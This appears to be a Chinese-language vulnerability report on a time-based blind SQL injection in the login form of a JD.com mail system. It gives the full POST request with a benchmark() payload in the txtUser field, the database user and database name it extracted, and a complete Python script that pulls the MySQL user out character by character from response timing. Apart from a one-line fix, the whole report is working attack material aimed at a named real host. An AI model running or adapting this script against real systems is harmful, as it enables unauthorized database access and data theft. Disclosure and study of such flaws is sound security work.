京东商城某重要系统MySQL注射(附验证脚本)

京东商城某重要系统MySQL注射(附验证脚本)

详细说明：

注射点：

code 区域

POST https://mail.jd.com/Erpout/Logon.aspx



captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5

参数txtUser可注入，MySQL time blind。benchmark(15000000,md5(1)),响应时间大于2.0s。

漏洞证明：

猜解MySQL user(),得到：

code 区域

[Done]MySQL user is [email protected]

code 区域

database():   jdmail

python验证脚本：

code 区域

#encoding=gbk

import httplib

import time

import string

import sys

import random

import urllib



headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'ValiCode=PDC9BIL5P735'}



payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')



print 'start to retrive MySQL user:'

user = ''



for i in range(1, 23):

    for payload in payloads:

        conn = httplib.HTTPSConnection('mail.jd.com', timeout=30)

        s = "captcha=test&destination=https://mail.jd.com/owa/&" \

            "flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \

            "&trusted=4&txtPassword=test&" \

            "txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \

            "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \

            "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5"

        conn.request(method='POST',

                     url="/Erpout/Logon.aspx",

                     body=s,

                     headers = headers)

        start_time = time.time()

        html_doc = conn.getresponse().read()

        conn.close()

        if time.time() - start_time > 2.0:

            user += payload

            print '\n[In progress] %s' % user

            break

        else:

            print '.',

            



print '\n[Done]MySQL user is', user

修复方案：

参数转义，过滤